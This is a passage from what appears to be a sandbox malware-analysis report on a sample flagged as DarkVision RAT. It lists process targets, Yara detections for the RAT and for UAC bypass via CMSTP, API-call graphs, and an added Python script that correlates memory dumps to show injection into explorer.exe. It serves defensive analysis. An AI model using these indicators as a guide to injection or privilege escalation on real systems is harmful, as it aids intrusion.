                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:low
                        Has exited:true

                        Target ID:3
                        Start time:01:33:00
                        Start date:31/12/2024
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\explorer.exe"
                        Imagebase:0x7ff674740000
                        File size:5'141'208 bytes
                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:false

                        Target ID:4
                        Start time:01:33:02
                        Start date:31/12/2024
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\EXPLORER.EXE {2046C745-B848-47EE-8068-B039EAC15A1C}
                        Imagebase:0x7ff674740000
                        File size:5'141'208 bytes
                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true
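The Yara match lists above are worth reading as a set rather than per process: the DarkVision rule fires on a dump at base 0x11C8000 in target 2 (the 32-bit second instance of uncrypted.exe) and on a dump at the same base in target 3 (the 64-bit explorer.exe that never exits), and on a dump at 0x400000 in target 2 that carries protection field 0x40. The following Python is an added example, not part of the Joe Sandbox report, that parses those dump names and reports the region shared across processes. The dotted dump name is read as target.stage.serial.base.protection.(other fields).sdmp; only the target and base-address fields are relied on, and decoding the fifth field as a Windows PAGE_* constant is this example's assumption, used for display only.

```python
"""Added example, not part of the Joe Sandbox report: correlate the Yara-hit
memory dumps listed per target above and find the payload region that appears
in more than one process.

Assumption: a dump name is read as
<target>.<stage>.<serial>.<base address>.<protection>.<...>.sdmp; only the
target and base-address fields are relied on. The protection decode is this
example's guess, used for display only.
"""
from collections import defaultdict

# Processes from the target list above: target id -> (image name, Wow64).
TARGETS = {0: ("uncrypted.exe", True), 2: ("uncrypted.exe", True), 3: ("explorer.exe", False)}

# DarkVision Rat hits copied from the Yara match lists above (dump names only).
DARKVISION_HITS = [
    "00000000.00000002.2055171521.0000000003F40000.00000004.00000800.00020000.00000000.sdmp",
    "00000000.00000002.2055171521.00000000040F9000.00000004.00000800.00020000.00000000.sdmp",
    "00000000.00000002.2055171521.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp",
    "00000000.00000002.2054936122.0000000002D81000.00000004.00000800.00020000.00000000.sdmp",
    "00000002.00000002.2041385974.00000000011C8000.00000004.00000020.00020000.00000000.sdmp",
    "00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp",
]

# Windows PAGE_* constants; that the fifth field holds them is an assumption.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}


def parse_dump_name(name: str) -> dict:
    """Decode the dotted fields of a .sdmp name (see module docstring)."""
    fields = name.rsplit(".sdmp", 1)[0].split(".")
    if len(fields) < 5:
        raise ValueError(f"unexpected dump name: {name}")
    protect = int(fields[4], 16)
    return {
        "target": int(fields[0], 16),
        "base": int(fields[3], 16),
        "protect": PAGE_PROTECT.get(protect, f"0x{protect:x}"),
    }


def shared_regions(dump_names) -> dict:
    """base address -> sorted target ids, for bases hit in more than one target."""
    by_base = defaultdict(set)
    for name in dump_names:
        d = parse_dump_name(name)
        by_base[d["base"]].add(d["target"])
    return {base: sorted(t) for base, t in by_base.items() if len(t) > 1}


def injection_candidates() -> list:
    """Shared regions whose targets are different images: the memory-level
    sign that one process wrote its payload into another."""
    out = []
    for base, targets in shared_regions(DARKVISION_HITS).items():
        images = [TARGETS[t][0] for t in targets]
        if len(set(images)) > 1:
            out.append((base, images))
    return out


if __name__ == "__main__":
    for name in DARKVISION_HITS:
        d = parse_dump_name(name)
        print(f"target {d['target']}  base 0x{d['base']:08X}  {d['protect']}")
    for base, images in injection_candidates():
        print(f"0x{base:08X} present in {' and '.join(images)}")
```

Run against the hits above this reports 0x11C8000 as present in both uncrypted.exe and explorer.exe, which is the region to carve from the explorer.exe dump when extracting the RAT configuration; the 0x400000 hit in target 2 decodes (under the stated assumption) as execute-read-write, consistent with the sample having unpacked over its own image.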


                          Execution Graph

                          Execution Coverage:9.9%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:30.8%
                          Total number of Nodes:39
                          Total number of Limit Nodes:6
                          execution_graph (addresses in the 01210000 memory dump; one line per connected component):
                          • 121e160 -> 121e1a2 -> 121e1a8 GetModuleHandleW -> 121e1d5
                          • 1210b52 -> 1211450 / 1210d4f / 1210d58 / 1211329; 1211450 -> 121140e, 1210d4f -> 1210d7f, 1210d58 -> 1210d7f, 1211329 -> 1211310; each of these loops through 1210534 VirtualProtect and exits to 121162a
                          • 1217527 -> 121752b -> 1217611 -> 1217635 -> 1217b19 / 1217b28 -> 1217b4f -> 1216f9c -> 1218bb8 CreateActCtxA -> 1218c7b (or 1217c2c); 121754e unconnected
                          • 12130d8 -> 1213120 VirtualProtect -> 121315a

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph: function at 1210d58, basic blocks 1210d58-1210dab through 1211785-1211792; calls 1210114, 12100e4, 12100f4, 1211848 and 1210534 (the VirtualProtect wrapper in the execution graph)
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2054740817.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1210000_uncrypted.jbxd
                          Similarity
                          • API ID:
                          • String ID: PO]q$TJbq$TJbq$Te]q
                          • API String ID: 0-3124343824
                          • Opcode ID: 9f77213a919a350f1ccff6c0ef6278d1c7c8e86886288d4b49e748c00790c54d
                          • Instruction ID: bdc10d295c1801d42e8f57a234e408f9aa691aee38de33aee08803ddb2f7ff53
                          • Opcode Fuzzy Hash: 9f77213a919a350f1ccff6c0ef6278d1c7c8e86886288d4b49e748c00790c54d
                          • Instruction Fuzzy Hash: CF620634A202148FDB54CF69C994B69BBF2FF98700F1581A9E60A9B365CA70ED81CF51

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph: function at 1210d4f, basic blocks 1210d4f-1210dab through 1211785-1211792 (same body as the 1210d58 entry); calls 1210114, 12100e4, 12100f4, 1211848 and 1210534 (the VirtualProtect wrapper in the execution graph)
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2054740817.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1210000_uncrypted.jbxd
                          Similarity
                          • API ID:
                          • String ID: PO]q$TJbq$TJbq$Te]q
                          • API String ID: 0-3124343824
                          • Opcode ID: 06bacb155fab60c580e67e215791e0aedf5dbe784189a06911d74565cdc1018c
                          • Instruction ID: cf25cf946a4cb7e03797cd979e1dde32c073edd6b5a1a372f7b231eb45e8538d
                          • Opcode Fuzzy Hash: 06bacb155fab60c580e67e215791e0aedf5dbe784189a06911d74565cdc1018c
                          • Instruction Fuzzy Hash: F8620734A20114CFDB54CF69C994B69BBF2FF98700F1581A9E60A9B3A5CA70ED81CF11

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph: function at 1211329, basic blocks 1211310-1211327 through 1211785-1211792; calls 12100f4, 1211848 and 1210534 (the VirtualProtect wrapper in the execution graph)
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2054740817.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1210000_uncrypted.jbxd
                          Similarity
                          • API ID:
                          • String ID: TJbq$Te]q
                          • API String ID: 0-3147309840
                          • Opcode ID: 1698fbc85fbc3a84a6f3f6f8c289efa19b66f5db1c09c7fc53cb24ba9ec98de9
                          • Instruction ID: 13444f59049fc3025046de15830f4e129a751ca8d897380333c0e82855d19b85
                          • Opcode Fuzzy Hash: 1698fbc85fbc3a84a6f3f6f8c289efa19b66f5db1c09c7fc53cb24ba9ec98de9
                          • Instruction Fuzzy Hash: DBD13A34A20215CFDB64DF68C894B6ABBF2FF98700F158099D60A9B369DB70AD41CF41

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1077 1218bac-1218c79 CreateActCtxA 1079 1218c82-1218cdc 1077->1079 1080 1218c7b-1218c81 1077->1080 1087 1218ceb-1218cef 1079->1087 1088 1218cde-1218ce1 1079->1088 1080->1079 1089 1218cf1-1218cfd 1087->1089 1090 1218d00 1087->1090 1088->1087 1089->1090 1092 1218d01 1090->1092 1092->1092
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 01218C69
                          Memory Dump Source
                          • Source File: 00000000.00000002.2054740817.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1210000_uncrypted.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: 181a8e0a0d7ea53990467340016fdac0971fbc6bbde8af64344020095e38034c
                          • Instruction ID: 1ab36979c9496aab1ada77fd77b5a6c8af460ca00eabaaca25534939f8844504
                          • Opcode Fuzzy Hash: 181a8e0a0d7ea53990467340016fdac0971fbc6bbde8af64344020095e38034c
                          • Instruction Fuzzy Hash: F9410FB1C00719CFDB28DFA9C884B9EBBF1BF48304F24806AD418AB255DB756946CF91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1093 1216f9c-1218c79 CreateActCtxA 1096 1218c82-1218cdc 1093->1096 1097 1218c7b-1218c81 1093->1097 1104 1218ceb-1218cef 1096->1104 1105 1218cde-1218ce1 1096->1105 1097->1096 1106 1218cf1-1218cfd 1104->1106 1107 1218d00 1104->1107 1105->1104 1106->1107 1109 1218d01 1107->1109 1109->1109
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 01218C69
                          Memory Dump Source
                          • Source File: 00000000.00000002.2054740817.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1210000_uncrypted.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: 7826efc9f365aaae6809656c5745730dab79afc0aa7b89b677960ad86215f68e
                          • Instruction ID: d7479c9335bb9ae80c57f3c5a7ed3fe229ae17c54b8de03751ac4d23d35c2489
                          • Opcode Fuzzy Hash: 7826efc9f365aaae6809656c5745730dab79afc0aa7b89b677960ad86215f68e
                          • Instruction Fuzzy Hash: 1741F1B0C00719CBDB28DFA9C884B9EBBF5BF48304F20816AD508AB255DB756945CF90

                          Control-flow Graph

                          • Rendered graph not reproduced (the executed / not-executed colouring is lost in extraction); its node/edge list gives five basic blocks between 0x12130ad and 0x1213182. The VirtualProtect call is in the block 0x12130ec-0x1213158; the two successor blocks (0x121315a-0x1213160 and 0x1213161-0x1213182) rejoin at 0x1213161.
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0121314B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2054740817.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1210000_uncrypted.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: c5a62b6f8c7bc39aa20c12e5d5796f6459e9fc100338e2d45be259286a65ef9c
                          • Instruction ID: f0c20a22d00b20cebd282d375a1493ec682f8d2fdbadaaaf0a71edd38f8fad1d
                          • Opcode Fuzzy Hash: c5a62b6f8c7bc39aa20c12e5d5796f6459e9fc100338e2d45be259286a65ef9c
                          • Instruction Fuzzy Hash: 5F31AEB28153859FCB12CFA9C4406DABFF4FF5A320F2084AAD498E7262D3799545CF61

                          Control-flow Graph

                          • Rendered graph not reproduced (the executed / not-executed colouring is lost in extraction); its node/edge list gives three basic blocks between 0x1210534 and 0x1211b32. The VirtualProtect call is in a single block covering 0x1210534-0x1211b08, which branches to 0x1211b0a-0x1211b10 or directly to 0x1211b11-0x1211b32, where both paths rejoin.
                          APIs
                          • VirtualProtect.KERNELBASE(?,00000001,?,?), ref: 01211AFB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2054740817.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1210000_uncrypted.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 816762025bb3f142073e73870594ec6b708907a48ce11091c215953a2809db6b
                          • Instruction ID: 487fd6952c4c2a827e2fb9cc9ae4b8cad9adbb79a46783b6fa21c69efc4d9ba9
                          • Opcode Fuzzy Hash: 816762025bb3f142073e73870594ec6b708907a48ce11091c215953a2809db6b
                          • Instruction Fuzzy Hash: 762106B2D002499FCB10DFAAC484BDEFBF4FB58310F108029E958A7251D378A944CFA1

                          Control-flow Graph

                          • Rendered graph not reproduced (the executed / not-executed colouring is lost in extraction); its node/edge list gives three basic blocks between 0x1211a81 and 0x1211b32. The VirtualProtect call is in the block 0x1211a81-0x1211b08 (the same call site, 0x1211afb, as the entry starting at 0x1210534), which branches to 0x1211b0a-0x1211b10 or directly to 0x1211b11-0x1211b32, where both paths rejoin.
                          APIs
                          • VirtualProtect.KERNELBASE(?,00000001,?,?), ref: 01211AFB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2054740817.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1210000_uncrypted.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 33231c01dd359262cf245caa23e5a648cc1b047d82ba9b10ccb7f4bc85142a76
                          • Instruction ID: 2a61fac274b1b37258b3eecd20d4fdf5fd4872d88433bb0e6adc5e25babb351a
                          • Opcode Fuzzy Hash: 33231c01dd359262cf245caa23e5a648cc1b047d82ba9b10ccb7f4bc85142a76
                          • Instruction Fuzzy Hash: B62106B19002499FCB10DFAAD484ADEFFF8FF49320F108429E958A7251D778A654CFA1

                          Control-flow Graph

                          • Rendered graph not reproduced (the executed / not-executed colouring is lost in extraction); its node/edge list gives three basic blocks between 0x12130d8 and 0x1213182. The VirtualProtect call is in the block 0x12130d8-0x1213158 (the same call site, 0x121314b, as the entry starting at 0x12130ad), which branches to 0x121315a-0x1213160 or directly to 0x1213161-0x1213182, where both paths rejoin.
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0121314B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2054740817.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1210000_uncrypted.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: df58396e904b949e24bf5ab3c386bea46b7ef62a7966f71ce4cf90a8d403137b
                          • Instruction ID: 6fd3f3a596331aa8f37ae68218259f2962c6691818a45ad9f4ad04fe60c6a403
                          • Opcode Fuzzy Hash: df58396e904b949e24bf5ab3c386bea46b7ef62a7966f71ce4cf90a8d403137b
                          • Instruction Fuzzy Hash: 6521E4B59002499FDB10DF9AC884BDEFBF5FF58320F108429E958A7251D378A944CFA1
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0121E1C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2054740817.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1210000_uncrypted.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 5d5d468a950a8dc7ed49678aa11792b2110a1a56801993190c0df4f1b88b3d3e
                          • Instruction ID: e136c7fec062869116cc0e38fceac500b31fdf5213bdb6091acf0590b4080345
                          • Opcode Fuzzy Hash: 5d5d468a950a8dc7ed49678aa11792b2110a1a56801993190c0df4f1b88b3d3e
                          • Instruction Fuzzy Hash: 0D1110B6C002498FDB10DF9AC844ADEFBF4EF89320F10842AD918B7610C379A945CFA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2050770660.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_108d000_uncrypted.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 630fdb4d729e5fe0f464b0ac88c7c1f03b972ba69d677789ce7c554fc0decb00
                          • Instruction ID: 07c588fe785d588dccdb2d089baaa6054a8973afc15624a399ef5a29bce41cb7
                          • Opcode Fuzzy Hash: 630fdb4d729e5fe0f464b0ac88c7c1f03b972ba69d677789ce7c554fc0decb00
                          • Instruction Fuzzy Hash: 4821D371508204DFDB15EFA8D984B16BFA5EB84354F20C6A9E9C94B396C33AD407CB61
                          Memory Dump Source
                          • Source File: 00000000.00000002.2050770660.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_108d000_uncrypted.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                          • Instruction ID: baf7b6da5eb13098359fce744d2c2efd953930ca279e52789d63e28ca9dcbc7f
                          • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                          • Instruction Fuzzy Hash: B611BE75508280CFDB12DF54D5C4B15BFA2FB44314F24C6AAE8894B696C33AD40BCF62

                          Execution Graph

                          Execution Coverage: 3.6%
                          Dynamic/Decrypted Code Coverage: 0%
                          Signature Coverage: 13.4%
                          Total number of Nodes: 2000
                          Total number of Limit Nodes: 41
                          • Rendered graph not reproduced. Its node/edge list is cut off in this copy at node 20552 (0x42dce2); what survives resolves to the following.
                          • A separate root at 0x4058c5 calls RtlCreateUserThread (0x4058df).
                          • CRT start-up at 0x4271cf: GetStartupInfoW (0x4271db), HeapSetInformation (0x4271ef), HeapCreate (0x42a9be), GetModuleHandleW and four GetProcAddress calls (0x4293d7, 0x4293f4), TlsAlloc and TlsSetValue (0x42943e, 0x42948c), EncodePointer/DecodePointer, GetCommandLineA (0x42727e), GetEnvironmentStringsW, WideCharToMultiByte and FreeEnvironmentStringsW (0x42bf08 onward), GetModuleFileNameA (0x42be67), GetStdHandle, GetFileType, SetHandleCount and InitializeCriticalSectionAndSpinCount (0x42c168 onward), then hands over to the sample's main at 0x401000 via 0x4272cd. The CRT helpers it pulls in are the allocator (RtlAllocateHeap at 0x4256f5, HeapAlloc at 0x42f4ec, HeapFree at 0x425758, Sleep at 0x42d28a, InterlockedIncrement/InterlockedDecrement), the code-page and locale routines (GetOEMCP, GetACP, IsValidCodePage, GetCPInfo, MultiByteToWideChar, GetStringTypeW, LCMapStringW) and the error paths (IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess at 0x42821e-0x428308; GetModuleFileNameW and WriteFile in __NMSG_WRITE; LoadLibraryW and GetProcAddress at 0x42e842; ExitProcess at 0x42a4e9).
                          • The sample's own code from 0x401000: LoadLibraryW (0x419140, 0x406840), OpenEventW (0x40110a), GetCommandLineW (0x40cbf0), CreateMutexW (0x4011dd), then OpenMutexW with LoadLibraryW and LocalAlloc (0x41cb80), GetModuleHandleA/GetProcAddress (0x41d170), a second and third CreateMutexW (0x4012c6, 0x401301) with GetLastError (0x4012ec) between them, ConvertStringSecurityDescriptorToSecurityDescriptorW (0x41d590), GetModuleHandleW (0x40c580), LocalAlloc (0x41de00), __snwprintf (0x42466a), a further OpenMutexW (0x401a50) and, at 0x401c29, either ExitProcess directly or Wow64DisableWow64FsRedirection (0x401c2e) followed by ExitProcess (0x401c3b). Further ExitProcess nodes sit at 0x401039, 0x401195, 0x4011c8, 0x401645 and 0x4016c9.
WideCharToMultiByte 20550->20552 20553 42dd04 20550->20553 20554 42dc98 __crtLCMapStringA_stat 20551->20554 20555 4256b9 _malloc 66 API calls 20551->20555 20552->20553 20556 42db22 __freea 66 API calls 20553->20556 20554->20542 20554->20550 20555->20554 20556->20542 20558->20496 20560 4299b6 20559->20560 20561 4299bd 20559->20561 20560->20561 20565 4299db 20560->20565 20562 4283ae ___strgtold12_l 66 API calls 20561->20562 20563 4299c2 20562->20563 20564 42835c ___strgtold12_l 11 API calls 20563->20564 20566 4299cc 20564->20566 20565->20566 20567 4283ae ___strgtold12_l 66 API calls 20565->20567 20566->19707 20567->20563 20569 42d201 EncodePointer 20568->20569 20569->20569 20570 42d21b 20569->20570 20570->19721 20574 429826 20571->20574 20573 42986f 20573->19723 20575 429832 _doexit 20574->20575 20582 42a508 20575->20582 20581 429853 _doexit 20581->20573 20583 42d7f5 __lock 66 API calls 20582->20583 20584 429837 20583->20584 20585 42973f DecodePointer DecodePointer 20584->20585 20586 4297ee 20585->20586 20587 42976d 20585->20587 20596 42985c 20586->20596 20587->20586 20599 42d997 20587->20599 20589 4297d1 EncodePointer EncodePointer 20589->20586 20590 42977f 20590->20589 20591 4297a3 20590->20591 20606 42d2af 20590->20606 20591->20586 20593 42d2af __realloc_crt 70 API calls 20591->20593 20594 4297bf EncodePointer 20591->20594 20595 4297b9 20593->20595 20594->20589 20595->20586 20595->20594 20632 42a511 20596->20632 20600 42d9a2 20599->20600 20601 42d9b7 HeapSize 20599->20601 20602 4283ae ___strgtold12_l 66 API calls 20600->20602 20601->20590 20603 42d9a7 20602->20603 20604 42835c ___strgtold12_l 11 API calls 20603->20604 20605 42d9b2 20604->20605 20605->20590 20609 42d2b8 20606->20609 20608 42d2f7 20608->20591 20609->20608 20610 42d2d8 Sleep 20609->20610 20611 42f534 20609->20611 20610->20609 20612 42f54a 20611->20612 20613 42f53f 20611->20613 20615 42f552 20612->20615 20624 42f55f 20612->20624 20614 4256b9 _malloc 66 API calls 20613->20614 20616 42f547 20614->20616 
20617 42574d _free 66 API calls 20615->20617 20616->20609 20631 42f55a _free 20617->20631 20618 42f597 20619 429888 _malloc DecodePointer 20618->20619 20621 42f59d 20619->20621 20620 42f567 HeapReAlloc 20620->20624 20620->20631 20622 4283ae ___strgtold12_l 66 API calls 20621->20622 20622->20631 20623 42f5c7 20626 4283ae ___strgtold12_l 66 API calls 20623->20626 20624->20618 20624->20620 20624->20623 20625 429888 _malloc DecodePointer 20624->20625 20628 42f5af 20624->20628 20625->20624 20627 42f5cc GetLastError 20626->20627 20627->20631 20629 4283ae ___strgtold12_l 66 API calls 20628->20629 20630 42f5b4 GetLastError 20629->20630 20630->20631 20631->20609 20635 42d71c LeaveCriticalSection 20632->20635 20634 429861 20634->20581 20635->20634 20641 419164 20636->20641 20644 401032 20636->20644 20637 419180 20640 4191e1 GetProcAddress 20637->20640 20637->20641 20643 4191a3 GetProcAddress 20637->20643 20638 419226 LoadLibraryW 20639 419241 20638->20639 20638->20644 20642 41931b LoadLibraryW 20639->20642 20650 419269 20639->20650 20640->20641 20646 4191d8 20640->20646 20641->20637 20641->20638 20642->20644 20651 419336 20642->20651 20643->20637 20643->20646 20644->19733 20644->19734 20645 4192d0 GetProcAddress 20645->20639 20645->20646 20646->20644 20647 419410 LoadLibraryW 20647->20644 20656 41942b 20647->20656 20648 41928f GetProcAddress 20648->20646 20648->20650 20649 4193c5 GetProcAddress 20649->20646 20649->20651 20650->20639 20650->20645 20650->20648 20651->20647 20655 41935e 20651->20655 20652 419505 LoadLibraryW 20652->20644 20664 419520 20652->20664 20653 419384 GetProcAddress 20653->20646 20653->20655 20654 4194ba GetProcAddress 20654->20646 20654->20656 20655->20649 20655->20651 20655->20653 20656->20652 20660 419453 20656->20660 20657 4195fa LoadLibraryW 20657->20644 20665 419615 20657->20665 20658 419479 GetProcAddress 20658->20646 20658->20660 20659 4195af GetProcAddress 20659->20646 20659->20664 20660->20654 20660->20656 20660->20658 20661 41956e 
GetProcAddress 20661->20644 20661->20664 20662 4196ef LoadLibraryW 20662->20644 20670 41970a 20662->20670 20663 4196a4 GetProcAddress 20663->20646 20663->20665 20664->20657 20664->20659 20664->20661 20665->20662 20668 41963d 20665->20668 20666 419663 GetProcAddress 20666->20646 20666->20668 20667 4197e4 LoadLibraryW 20667->20644 20675 4197ff 20667->20675 20668->20663 20668->20665 20668->20666 20669 419799 GetProcAddress 20669->20646 20669->20670 20670->20667 20673 419732 20670->20673 20671 419758 GetProcAddress 20671->20646 20671->20673 20672 4198d9 LoadLibraryW 20672->20644 20680 4198f4 20672->20680 20673->20669 20673->20670 20673->20671 20674 41988e GetProcAddress 20674->20646 20674->20675 20675->20672 20679 419827 20675->20679 20676 4199ce LoadLibraryW 20676->20644 20685 4199e9 20676->20685 20677 41984d GetProcAddress 20677->20646 20677->20679 20678 419983 GetProcAddress 20678->20646 20678->20680 20679->20674 20679->20675 20679->20677 20680->20676 20684 41991c 20680->20684 20681 419ac3 LoadLibraryW 20681->20644 20690 419ade 20681->20690 20682 419942 GetProcAddress 20682->20646 20682->20684 20683 419a78 GetProcAddress 20683->20646 20683->20685 20684->20678 20684->20680 20684->20682 20685->20681 20689 419a11 20685->20689 20686 419bb8 LoadLibraryW 20686->20644 20695 419bd3 20686->20695 20687 419a37 GetProcAddress 20687->20646 20687->20689 20688 419b6d GetProcAddress 20688->20646 20688->20690 20689->20683 20689->20685 20689->20687 20690->20686 20694 419b06 20690->20694 20691 419cad LoadLibraryW 20691->20644 20700 419cc8 20691->20700 20692 419b2c GetProcAddress 20692->20646 20692->20694 20693 419c62 GetProcAddress 20693->20646 20693->20695 20694->20688 20694->20690 20694->20692 20695->20691 20699 419bfb 20695->20699 20696 419da2 LoadLibraryW 20696->20644 20705 419dbd 20696->20705 20697 419c21 GetProcAddress 20697->20646 20697->20699 20698 419d57 GetProcAddress 20698->20646 20698->20700 20699->20693 20699->20695 20699->20697 20700->20696 20704 419cf0 20700->20704 
20701 419d16 GetProcAddress 20701->20646 20701->20704 20702 419e97 LoadLibraryW 20702->20644 20712 419eb2 20702->20712 20703 419e4c GetProcAddress 20703->20646 20703->20705 20704->20698 20704->20700 20704->20701 20705->20702 20708 419de5 20705->20708 20706 419e0b GetProcAddress 20706->20646 20706->20708 20707 419f8c LoadLibraryW 20707->20644 20716 419fa7 20707->20716 20708->20703 20708->20705 20708->20706 20709 419f41 GetProcAddress 20709->20646 20709->20712 20710 419f00 GetProcAddress 20710->20644 20710->20712 20711 41a081 LoadLibraryW 20711->20644 20717 41a09c 20711->20717 20712->20707 20712->20709 20712->20710 20713 41a036 GetProcAddress 20713->20646 20713->20716 20714 419ff5 GetProcAddress 20714->20644 20714->20716 20715 41a128 GetProcAddress 20715->20646 20715->20717 20716->20711 20716->20713 20716->20714 20717->20644 20719 41a0c4 20717->20719 20718 41a0ea GetProcAddress 20718->20646 20718->20719 20719->20715 20719->20717 20719->20718 20721 401085 20720->20721 20722 40685a GetProcAddress 20720->20722 20725 41d2c0 GetModuleHandleW GetProcAddress 20721->20725 20723 406872 20722->20723 20724 406878 FreeLibrary 20722->20724 20723->20724 20724->20721 20726 40108a Wow64DisableWow64FsRedirection CreateMutexW 20725->20726 20727 41d2fc GetCurrentProcess 20725->20727 20726->19740 20727->20726 21017 4245f0 20728->21017 20731 4084e4 _memset 20732 408500 GetWindowsDirectoryW 20731->20732 20733 40851d _memset 20732->20733 20742 401101 20732->20742 20734 408539 GetSystemDirectoryW 20733->20734 20735 408556 _memset 20734->20735 20734->20742 20736 42466a __snwprintf 102 API calls 20735->20736 20737 408592 _memset 20736->20737 20738 42466a __snwprintf 102 API calls 20737->20738 20739 4085d1 _memset 20738->20739 20740 42466a __snwprintf 102 API calls 20739->20740 20741 408610 StrCmpIW 20740->20741 20741->20742 20742->19743 20742->19744 20744 41cbd2 GetModuleFileNameW 20743->20744 20751 41cbc8 20743->20751 20745 41cbf1 20744->20745 20752 41cbe7 20744->20752 20746 41cc10 
